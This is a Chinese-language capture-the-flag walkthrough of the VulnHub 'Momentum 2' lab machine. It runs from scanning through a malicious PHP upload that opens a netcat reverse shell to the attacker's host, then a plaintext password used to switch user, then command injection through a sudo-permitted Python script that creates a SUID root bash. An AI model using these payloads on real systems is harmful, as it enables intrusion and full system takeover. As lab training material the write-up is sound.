這是VulnHub 平台的一個用於練習滲透測試和漏洞利用的靶機。它被設計為一個中等難度的挑戰,目標是讓滲透測試人員鍛練PHP源碼檢測及權限提升的技能。該靶機滲透做法如下
搜集情報
掃描網段netdiscover -i eth0 -r 192.168.0.0/24發現目標主機192.168.0.111
掃描目標主機port nmap 192.168.0.111發現22,80port開放
掃描網站目錄gobuster dir -u http://192.168.0.111/ -x html,txt,php,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
發現幾個特別的檔案如下
- /ajax.php.bak
- /ajax.php
- /dashboard.html
尋找web漏洞
訪問/dashboard.html發現是一個檔案上傳的頁面, 分析頁面後發現主要功能在main.js如下
function uploadFile(){
...omit...
// Set POST method and ajax file path
xhttp.open("POST","ajax.php",true);
...omit...從代碼中發現會使用ajax.php,ajax.php.bak代碼如下
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array("pdf","php","txt");
}
else{
$valid_ext = array("txt");
}
// Remember success upload returns 1 以上資訊,整理如下
- admin可上傳php
- 發現一個不完整的admin的cookie,因為缺一個字母,該字母是英文大寫,嘗試26個字母後發現是R
- 上傳時內容必須增加secure參數而且值為valid
- 如果上傳成功會返回1
配合這些資訊要將上傳檔案的請求改成以下
POST /ajax.php HTTP/1.1
Host: 192.168.0.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136110921536555815714284481441
Content-Length: 5842
Origin: http://192.168.0.111
Connection: close
Cookie: admin=&G6u@B6uDXMq&MsR
Referer: http://192.168.0.111/dashboard.html
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="secure";
val1d
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php
<?php shell_exec('nc 192.168.0.100 1234 -s /bin/bash'); ?>
-----------------------------136110921536555815714284481441--攻擊主機要在上傳shell.php前先監聽port 1234,上傳成功後會收到反向shell的信息
192.168.0.100 # nc -lvp 1234
listening on [any] 1234
connect to [192.168.0.100] from...omit...[192.168.0.111]
whoami
www-data提權到athena
將shell提昇為互動式shell後,尋找目標檔案,之後在家目錄下發現目標
www-data@momentum2:/home/athena$ ls
password-reminder.txt user.txt
www-data@momentum2:/home/athena$ cat user.txt
...omit...
FLAG:
....omit...讀取password-reminder.txt發現密碼,經測試是athena密碼
www-data@momentum2:/home/athena$ cat password-reminder.txt
password : myvulnerableapp[Asterisk]
www-data@momentum2:/home/athena$ su athena
su athena
Password: myvulnerableapp*
athena@momentum2:~$ 提權root
athena@192.168.1.240:~$ sudo -l
sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.pycookie-gen.py的代碼如下
import random
import os
import subprocess
print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed
cookie = ''
for c in range(20):
cookie += random.choice(chars)
print(cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)根據上面的代碼發現,輸入數字後,後面可以接任何指令用root身份執行, 使用2;bash -i測試發現可以但不太完善
因此改成以下指令複制一個臨時的bash並給suid權限,執行後成功登入root
athena@momentum2:~$ cd /home/team-tasks
athena@momentum2:/home/team-tasks$ sudo python3 cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : 2;cp /bin/bash /tmp/bash; chmod u+s /tmp/bash
SLhHfZUPTWW$WUGLDDWO
2
athena@momentum2:/home/team-tasks$ /tmp/bash
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt
...omit...
FLAG:
...omit...refer
https://infosecwriteups.com/vulnhub-momentum-2-walkthrough-8addad2e6a8f
https://www.dotnetrussell.com/index.php/2021/07/16/vulnhub-momentum2-vm-walkthrough
https://blog.gibbons.digital/hacking/2021/07/11/momentum.html
https://nepcodex.com/2021/06/momentum-2-walkthrough-vulnhub-writeup